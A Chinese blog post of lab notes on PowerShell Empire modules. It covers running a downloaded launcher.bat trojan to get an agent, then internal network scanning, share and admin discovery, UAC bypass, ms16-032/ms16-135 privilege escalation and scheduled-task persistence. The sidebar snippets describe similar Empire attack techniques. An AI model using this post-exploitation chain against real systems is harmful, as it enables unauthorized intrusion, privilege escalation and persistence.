Empire 常用模块的使用

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量108 收藏
点赞数
分类专栏: 后渗透emp使用 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127821004
版权

在window8浏览器中输入http://192.168.0.111/launcher.bat

下载kail生成的木马bat文件

打开bat文件就有一个代理过来了

 因为现在间隔是5秒钟,我们把它设置为零

1.主机发现       

arp扫描

situational_awareness/network/arpscan

set Range 192.168.0.1-192.168.0.100

execute

扫描出内网ip

同样方法进行smb扫描 

network/smbscanner   

2.端口扫描

usemodule situational_awareness/network/portscan  

参数配置

设置扫的主机ip192.168.0.133 要保证ping的通

然后看看信息info 参数配置:

这里主要是设置445端口

然后看参数的设置信息可知主要是扫445端口开放的主机

执行端口扫描

执行结果

3.查找本地管理员的主机

situational_awareness/network/powerview/find_localadmin_access

然后info查看信息

4.查看共享文件

 situational_awareness/network/powerview/share_finder

5.本地信息收集

situational_awareness/host/winenum

  1. 提权

bypassuac

privesc/bypassuac

扫描环境向量提权

privesc/powerup/allchecks

计划任务system提权

persistence/elevated/schtasks  

set Listener test

首先开个代理

 

然后info,查看参数

 设置某时间开始执行,然后设置监听器,进行执行

 返回

溢出提权漏洞

powershell/privesc/ms16-032

powershell/privesc/ms16-135

 

 设置监听器让它执行

jack-yyj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
empire用法笔记
发哥微课堂
02-28 4485
0x00:简介 empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的免杀效果。结合 msf 使用更是如虎添翼。empire 安装下载命令如下: git clone https://github.com/EmpireProjec...
empire3.6.1使用教程
weixin_45230825的博客
11-24 2944
empire使用 0 安装成功后在Empire文件夹中打开终端执行./empire 1.设置监听 输入 listeners 命令进入监听模块,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,选http 然后info就能查看监听的详细信息辣 最后设置好监听的Name(随便起)和Host(默认本机ip)和Port(80) 然后execute,就拿下了 在listeners 模块下通过 list 命令可查看已经设置的监听。 2.生成木马 设置好监听后通过 back 命令返回上一级
empire(二)常见模块使用
qq_56426046的博客
09-12 248
arp扫描设置主机范围执行execute扫描结果如下smb扫描。
后渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
Web安全攻防渗透测试
m0_63223219的博客
04-05 6868
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
Powershell Empire的使用
她叫常玉莹
07-04 4057
EmpireEmpire简介使用方法设置监听生成木马DLL木马launcherlauncher_vbs木马launcher_bat 木马Macro木马Ducky连接主机信息收集屏幕截图键盘记录剪贴板记录查找共享收集目标主机信息ARP扫描DNS信息获取查找域管登陆服务器IP本地管理组访问模块提权Bypass UACbypassuac_wscriptPowerUpAllChecks模块GPP横向渗透会话注入Invoke-PsExecInvoke-WMIPowerShell Remoting后门权限持久性劫持sh
Empire用法及操作
weixin_65695770的博客
04-07 1138
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
powershell-empire4使用介绍
u013930899的博客
05-25 436
目录 一、工具使用 1.基本使用 2.agent代理 2.1. agent代理操作命令 2.2. 连入agent后的命令 3.三大类模块 3.1.situational awareness态势感知,也就是信息收集 3.2. Credentials and privilege escalation 权限提升和凭证获取 3.3.Lateral movement 内网横向移动 4.Empire+matesploit联合使用 前言 本文通过学习整理了empire4的...
Empire内网渗透工具简单使用
yangbz123的博客
04-24 2032
文章目录工具介绍下载地址功能介绍设置监听生成木马后门1、Windows launcher_bat批处理脚本木马2、Windows dll动态链接文件木马3、Windows launcher_vbs 脚本木马4、Windows powershell payload脚本上线5、Windows macro(office宏)木马6、linux bash payload脚本上线Agent上线Interact 切换agents常用参数参考文献 工具介绍 Empire是一款强大的Powershell脚本利用框架,类似于M
Empire知识点梳理
09-25
模块使用** - **信息收集** - **查看系统基本信息**:`usemodule situational_awareness/host/winenum` - 包括本机用户、域成员、最后密码设置时间等。 - **列举系统中所有有用的信息**:`usemodule ...
Empire CMS 6.5免登陆文章发布接口
10-11
1. `Empire CMS 6.5 免登陆接口文章发布模块.cwr`:这可能是一个配置文件或者源代码文件,包含了接口的具体实现细节。CWR可能是一种专有的文件格式,用于存储接口的配置或者逻辑。 2. `jiekou_utf8.php` 和 `jiekou...
7DaysofRed:您最喜欢的工具可以用来实现后期开发目标的7天Red Teaming TTP
04-02
这可能涉及Windows权限提升的工具如Empire或Meterpreter,它们提供了各种模块来执行提权操作。 3. **信息收集**:红队会收集目标系统的敏感信息,如用户凭证、网络拓扑、安全策略等。使用工具如Mimikatz获取密码...
内网渗透测试-提权工具
05-25
Meterpreter是Metasploit框架的一部分,它提供了一个交互式的会话,允许攻击者执行各种提权模块。Psexec是一个远程执行命令的工具,常用于在系统间获得提升的权限。Empire则是一个完全的 PowerShell 框架,适用于...
php主流cms系统测评.pdf
11-10
Empire CMS是一款B/S结构的系统,功能强大且易于使用,适用于Linux、Windows、Unix环境。其提供了一整套高效的网站解决方案。官方网站:http://www.phome.net 4. PHP168整站系统 PHP168整站系统完全开源,适合进行...
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 411
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 981
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 506
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
Empire安装与使用教程:搭建Python2环境与反弹shell
使用Empire时,首先启动Empire,然后通过`listeners`命令查看或管理监听器。例如,创建一个名为"hacker"的HTTP监听器,设置主机地址为`http://192.168.1.14:443`。接着,可以使用`usestager`生成恶意payload,如`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值